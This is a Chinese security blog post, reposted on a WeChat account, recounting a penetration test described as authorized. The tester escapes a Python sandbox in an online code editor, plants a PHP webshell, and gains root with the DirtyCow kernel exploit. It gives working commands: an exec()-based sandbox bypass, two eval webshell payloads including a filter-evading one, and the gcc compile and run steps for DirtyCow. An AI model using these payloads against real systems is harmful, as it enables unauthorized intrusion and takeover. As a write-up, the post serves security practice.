查看原文
其他

从外网绕过沙箱逃逸再到内网权限提升的一次常规渗透项目

听风安全 2023-11-28

The following article is from flower安全混子 Author Flowers aq

免责声明
由于传播、利用本公众号听风安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号听风安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

公众号现在只对常读和星标的公众号才展示大图推送,

建议大家把听风安全设为星标,否则可能就看不到啦!

----------------------------------------------------------------------

前言:

  最近也临近假期了也是一直在忙着干其它事情好久没写实战文章了,今天这个项目是之前一位企业运营加了花某授权的一次私人项目写的也是这次测试过程中相对简单的一环

已经过甲方授权发表文章。

代码执行和提权:

由于甲方规定不可使用扫描工具所以信息收集部分也得手动搜集

首先切入甲方给予的主域名之一 “test1.cn”

底下版权区存在友链点击发现其它资产

友情链接处第一项为【业务扩展】点击此超链接

发现甲方企业下属的子公司是个教育培训公司,由于在【授权书】中有说明企业下属子公司也算有效测试所以就讲这一大资产也列举为了测试资产之一。

培训公司主域名打开后发现业务主要为python培训,随后开始继续收集站点功能点寻找和梳理突破口。

发现一个提示面板但是没用直接舍弃了

梳理完资产后发现存在【python大闯关】功能点,实际浏览进一步突破:

看描述是练习print的点击发现存在在线编辑:

这是结果区:

测试发现可以编辑并运行代码所以第一时间就想到了沙箱逃逸

响应包中发现是nginx搭建的,根据经验nginx在linux上是要常见些的,当时也有很多win系统也用nginx搭建网站,但是花某这块先是用linux命令结合payload进行了测试:

首先直接输入:

import os os.system

提示非法import但是并没有给出是import语句非法还是import这个字符串非法所以进一步测试认证一下:

成功输出“import”所以是禁用了import语句而并非禁用了字符串,所以就有了操作空间这块直接构造payload试试:

command = 'import os\nos.system("id")'exec(command)

这个payload是将 import os\nos.system("id") 作为一个字符串赋值给 command 变量,并使用 exec 函数执行了这个字符串中的代码。这样就能够实现和 os.system("id") 类似的效果,所以就绕过了import导入os的这一步操作从而绕过沙箱禁用import:

uid为501的普通用户,少见,但是还是回显了id命令的执行结果所以进一步利用,到了这一步通常就是写入py的shell了但是浏览功能点我发现了一个问题,py沙箱的的路径是

http://test1.user1.cn/pyuctu

然后再此路径下也是存在php文件的例如:

http://test1.user1.cn/search.php

就是个搜索栏所以写入php的shell应该也是能解析的,去构造payload试试:

command = 'import os\nos.system("echo "<?php @eval($_POST['cmd']); ?>" >> 1.php")'exec(command)

蚁剑连接试试:

报错,看信息应该是文件不存在但是在沙箱中命令却是回显成功了,根据自身猜测去网站看看:

访问shell的位置:

http://test1.user1.cn/1.php

这块知道shell位置是因为此前还运行的ls确认的目录为根目录,沙箱也在根目录中所以shell位置就确定了,但是访问shell位置却回显不存在:

写入的shell不见了应该是被杀了,后续尝试了多个免杀的shell最终成功的是:

<?php $a=$_REQUEST['x']; $b="\n";eval($b.=$a);?>

根据shell就能知道应该是过滤了GET和POST了,shell管理工具连接。

用蚁剑再上个大马,因人而异花某只是感觉用蚁剑上传比较方便且传个冰蝎用冰蝎再进一步操作也很方便。

连接后查看基本信息看看:

CentOS 6.8系统2.6.32-642.15.1.el6.x86_64的内核,看到这个版本和内核直接脏牛提权试试:

https://github.com/FireFart/dirtycow/blob/master/dirty.c

下载exp,上传至目录

gcc -pthread /tmp/dirty.c -o /tmp/dirty -lcrypt

第一次编译失败后面发现是没下载gcc所以下载一下

yum install gcc

编译成功后下载运行exp

./dirty


再次查看id值:

成功。

总结:

这次的难度主要集中再沙箱逃逸中整体难度适中,后面的提权很奇怪对于

StackClash(CVE-2017-1000364)和SOCK_RAW(CVE-2016-8655)

都有打补丁但是对于较常见脏牛却没有。


不可错过的往期推荐哦


巧用OpenSSH进行域内权限维持

一次市hvv及省hvv的思路总结

越南海莲花APT针对中国大陆的邮件钓鱼技战术手法总结

对抗临近 | 红队大佬的私人秘籍:EDR绕过技术曝光!

带防护的Windows域渗透

渗透实战|NPS反制之绕过登陆验证

干货|从无到有学习Golang编写poc&exp

点击下方名片,关注我们

觉得内容不错,就点下“”和“在看

如果不想错过新的内容推送可以设为星标
继续滑动看下一个

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存